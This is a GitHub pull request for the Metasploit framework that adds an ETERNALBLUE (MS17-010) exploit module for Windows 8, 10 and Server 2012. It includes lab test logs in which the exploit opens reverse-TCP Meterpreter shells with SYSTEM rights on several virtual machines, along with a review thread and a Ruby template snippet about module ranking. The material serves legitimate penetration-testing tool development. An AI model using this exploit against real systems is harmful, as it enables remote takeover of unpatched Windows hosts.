Add sleepya's ETERNALBLUE exploit for Win8+ as an external module #10184

Merged
merged 8 commits into from Jun 19, 2018

6 participants
wvu-r7 commented Jun 18, 2018

WIP 🍻

This is a stopgap until we understand ETERNALBLUE well enough to add our own targets.

Tested on Windows 10 Enterprise Evaluation Build 10586 x64.

  • Test Windows 8
  • Test Windows 10
  • Test 2012
  • Replace this with original work

msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] shellcode size: 1221
[*] numGroomConn: 13
[*] Target OS: Windows 10 Enterprise Evaluation 10586
[*] got good NT Trans response
[*] got good NT Trans response
[*] SMB1 session setup allocate nonpaged pool success
[*] SMB1 session setup allocate nonpaged pool success
[*] good response status for nx: INVALID_PARAMETER
[*] good response status: INVALID_PARAMETER
[*] done
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49671) at 2018-06-18 12:40:44 -0500

meterpreter > getuid
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (Build 10586).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >

Don't mind the first getuid, since I was impatient before stdapi was loaded.

jmartin-r7 commented Jun 18, 2018

Jenkins test this please.

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/eternalblue branch from 10687f0 to df4cee1 Jun 19, 2018

wvu-r7 added some commits Jun 19, 2018

Rename remote_exploit_generic template
Dropping "generic" from the name. I initially had some reservations
about leaving it in, and after discussion with @acammack-r7, we've
decided it adds nothing useful.

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/eternalblue branch from e10d284 to 9913606 Jun 19, 2018

require 'msf/core/module/external'

class MetasploitModule < Msf::Exploit::Remote
Rank = <%= meta[:rank] %>

acammack-r7 Jun 19, 2018

I think we can pull this into a shared template that looks something like:

Rank = <%= meta[:rank].capitalize %>Ranking

wvu-r7 Jun 19, 2018

Generally only exploits and encoders use rank, but it's available to all modules. Shared template is fine. I like this change!

wvu-r7 Jun 19, 2018

I've decided to move the logic into the shim and keep it for exploits right now. Let me know what you think!
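The review thread above settles on deriving the `Rank` constant from module metadata with `meta[:rank].capitalize` plus the `Ranking` suffix. The following is an added illustration, not code from this pull request or from Metasploit, of how such a shared template can render that line with ERB and reject a rank value that does not name a known ranking. The ranking table, the `rank_constant` and `render_shim` helper names, and the `meta` hash are all assumptions made for the demo; the numeric values stand in for whatever the framework defines.

```ruby
require 'erb'

# Assumed stand-in for the framework's ranking constants (names taken from the
# ExcellentRanking convention discussed in review; values are illustrative only).
RANKINGS = {
  'ManualRanking'    => 0,
  'LowRanking'       => 100,
  'AverageRanking'   => 200,
  'NormalRanking'    => 300,
  'GoodRanking'      => 400,
  'GreatRanking'     => 500,
  'ExcellentRanking' => 600,
}.freeze

# Hypothetical shape of a shared shim template for external modules.
# The Rank line mirrors the one proposed in the review comments.
TEMPLATE = <<~ERB
  require 'msf/core/module/external'

  # <%= meta[:name] %>
  class MetasploitModule < Msf::Exploit::Remote
    Rank = <%= rank_constant(meta[:rank]) %>
  end
ERB

# Map a metadata rank string ("excellent", "EXCELLENT", " Good ") to the
# constant name the shim should reference. String#capitalize upper-cases the
# first character and lower-cases the rest, so case variants in metadata
# all normalise to the same constant. Unknown ranks fail loudly rather than
# producing a shim that raises NameError only when the module is loaded.
def rank_constant(rank)
  name = "#{rank.to_s.strip.capitalize}Ranking"
  unless RANKINGS.key?(name)
    raise ArgumentError, "unknown rank #{rank.inspect}; expected one of " \
                         "#{RANKINGS.keys.map { |k| k.sub(/Ranking\z/, '').downcase }.join(', ')}"
  end
  name
end

# Render the shim source for one module's metadata hash.
def render_shim(meta)
  ERB.new(TEMPLATE).result_with_hash(meta: meta)
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample metadata, not taken from any real module.
  meta = { name: 'Example external exploit', rank: 'excellent' }
  puts render_shim(meta)
end
```

Validating the rank at template-render time is the useful part: a typo in a module's metadata is caught when the shim is generated, with a message listing the accepted values, instead of surfacing as an undefined constant at load time.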

wvu-r7 commented Jun 19, 2018

Windows 8.1 tested:

msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] shellcode size: 1221
[*] numGroomConn: 13
[*] Target OS: Windows 8.1 9600
[*] got good NT Trans response
[*] got good NT Trans response
[*] SMB1 session setup allocate nonpaged pool success
[*] SMB1 session setup allocate nonpaged pool success
[*] good response status for nx: INVALID_PARAMETER
[*] good response status: INVALID_PARAMETER
[*] done
[*] Sending stage (206403 bytes) to 192.168.56.103
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.103:49159) at 2018-06-19 16:29:13 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : LIVINGROOM-PC
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
wvu-r7 commented Jun 19, 2018

Windows Server 2012 R2 tested:

msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] shellcode size: 1221
[*] numGroomConn: 13
[*] Target OS: Windows Server 2012 R2 Standard Evaluation 9600
[*] got good NT Trans response
[*] got good NT Trans response
[*] SMB1 session setup allocate nonpaged pool success
[*] SMB1 session setup allocate nonpaged pool success
[*] good response status for nx: INVALID_PARAMETER
[*] good response status: INVALID_PARAMETER
[*] done
[*] Sending stage (206403 bytes) to 192.168.56.105
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.105:49158) at 2018-06-19 17:31:35 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-DEEAVK8VA6A
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

@busterb busterb removed the delayed label Jun 19, 2018

@busterb busterb merged commit 0820268 into rapid7:master Jun 19, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed

busterb added a commit that referenced this pull request Jun 19, 2018

msjenkins-r7 added a commit that referenced this pull request Jun 19, 2018

busterb commented Jun 19, 2018

Release Notes

This adds sleepya's MS17-010 ETERNALBLUE exploit variant for Windows 8, Windows 10, and Windows 2012 as an external module, exploit/windows/smb/ms17_010_eternalblue_win8. It also adds a generic exploit template for external modules and makes some improvements to the ranking system as well.

OJ commented Jun 19, 2018

Great work folks 👍

wvu-r7 commented Jun 19, 2018

🙏

I'll have a second round of improvements later. Thanks!

@wvu-r7 wvu-r7 referenced this pull request Jun 20, 2018

Merged

Second round of updates to ETERNALBLUE external module #10189

2 of 2 tasks complete

@tdoan-r7 tdoan-r7 added the rn-exploit label Jul 5, 2018

@busterb busterb self-assigned this Oct 5, 2018
